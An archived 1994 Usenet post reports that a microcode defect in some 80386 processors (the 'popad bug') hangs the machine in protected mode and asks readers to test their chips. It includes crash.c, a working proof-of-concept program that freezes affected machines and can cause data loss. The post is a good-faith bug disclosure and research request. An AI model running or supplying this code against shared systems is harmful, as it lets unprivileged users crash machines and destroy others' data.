*BSD News Article 27831


Return to BSD News archive

Path: sserve!newshost.anu.edu.au!munnari.oz.au!news.Hawaii.Edu!ames!elroy.jpl.nasa.gov!usc!howland.reston.ans.net!agate!msuinfo!harbinger.cc.monash.edu.au!jacobi.maths.monash.edu.au!billm
From: billm@jacobi.maths.monash.edu.au (WE Metzenthen)
Newsgroups: comp.os.386bsd.development
Subject: Serious 80386 bug
Date: 24 Feb 1994 04:11:30 GMT
Organization: Monash University
Lines: 133
Message-ID: <2kh9di$igb@harbinger.cc.monash.edu.au>
NNTP-Posting-Host: jacobi.maths.monash.edu.au
X-Newsreader: TIN [version 1.2 PL2]

[ Article crossposted from comp.os.linux.development ]
[ Author was WE Metzenthen ]
[ Posted on 24 Feb 1994 04:06:12 GMT ]


      Running 'crashme' on my Linux system for a few hours caused my
machine to hang. After a few hours of investigation I found the
cause. It is due to a serious bug in the microcode of some 80386's.

      In about July 1989 there was some discussion on the net about
the "popad bug" in 80386 processors. It appeared to affect all 80386's
(dx or sx, Intel or AMD) but no 80486 was found which had the bug. The
bug appeared to be benign in so far as its only bad effect seemed to
be to put incorrect contents into the eax register, and there was an
easy work-around. All of the discussion at that stage seemed to be
concerned with tests done in real mode.

      From my experiments, the effects of the bug in protected mode
appear to be far more serious. It causes my machine to hang. I have
not yet been able to discover if the processor is still executing
instructions after encountering the offending code.

      I have attached the code which triggers the bug to the end of
this posting. BE AWARE THAT THIS CODE CAN RESULT IN DATA LOSS. It is
probably safest to put the code onto ram disk and run it without
any physical disks mounted. I have run it a number of times with
disks mounted and e2fsck has always been able to do the minor fix-up
when I rebooted.

      At this stage I know of no way to overcome this bug. Unless some
magic is found, it appears impossible for the operating system to
guard against it. Fortunately, it appears that the probability of
accidently triggering the bug is very low. However, any 80386 machine
which has this bug should not allow public access where users can run
their own code.

      In response to a related posting yesterday to a hardware group,
one user reports that the popad bug exists on an 80386-40, another
reports an 80386sx which doesn't have it. Art Boyne
<boyne@lvld.hp.com> writes that later versions of the 80386 have the
popad bug fixed:

> Yes.  It is fixed in (at least) the double-sigma step, which I believe
> is still the current 386 stepping.  These chips are identified by two
> sigma signs on the package.
       
      It may be helful if owners of 80386 machines who, AFTER TAKING
SUITABLE PRECAUTIONS, run the program at the end of this posting would
mail the results to me including the age of the 80386 (or post to
comp.os.linux.development). Thanks.

      (My machine uses a 33MHz AMD 80386. The motherboard was
manufactured in Jan 1992.)


--Bill


--------------------------- start of crash.c ------------------------------
/*
   crash.c

   A small program to crash 80386 machines.

   *****************************  NOTE  ****************************
   DO NOT RUN THIS PROGRAM UNLESS YOU ARE WILLING TO ACCEPT POSSIBLE
   DATA LOSS!

   W. Metzenthen  23rd Feb 1994.
   <billm@jacobi.maths.monash.edu.au>

   This code relies upon a defect in the 80386 microcode, i.e. the
   so-called "popad bug".
   A few experiments have been tried. Three components appear to be needed:
   1) an operand-size prefix byte,
   2) a 'popa' instruction, and
   3) a critical instruction immediately after the popa. This may
      be 'xchgb %al,(%eax)' or similar.
   This code cannot be debugged with gdb, etc; the bug will go away
   if an attempt is made to single-step it.

   None of the following instructions are suitable for use as 3) above
   (they won't crash the machine):
     nop
     movl _x,%eax
     xchgb  %al,%ah
     xchgb  %al,_x
     xchgb  %al,(0)
   but this is:
     xchgb  %al,0xfffffff6(%eax,8)
 */
main()
{
  /* Put a valid address into eax, (but not needed). */
  asm volatile ("movl %esp,%eax");

  /* This is the code which does the damage: */
  asm volatile ("
    .byte 0x66
    popa
    xchgb  %al,(%eax)
    ");

#define TRY_RECOVERY
#ifdef TRY_RECOVERY
  /* Possible recovery if the processor has been put into real mode
     (but doesn't work on my machine): */
  asm volatile ("nop; nop; nop; nop; nop; nop
    /* If in real mode, a far jump to f000:fff0 should cause a re-boot: */
    .byte 0xea, 0xf0, 0xff, 0x00, 0xf0
    ");
#endif TRY_RECOVERY

  exit(0); /* Just in case the above code doesn't crash the machine */
}
---------------------------- end of crash.c -------------------------------


--
Bill Metzenthen
Mathematics Department
Monash University
Clayton, Victoria, Australia
email: billm@vaxc.cc.monash.edu.au
       billm@euler.maths.monash.edu.au

--
Bill Metzenthen
Mathematics Department
Monash University
Clayton, Victoria, Australia
email: billm@vaxc.cc.monash.edu.au
       billm@euler.maths.monash.edu.au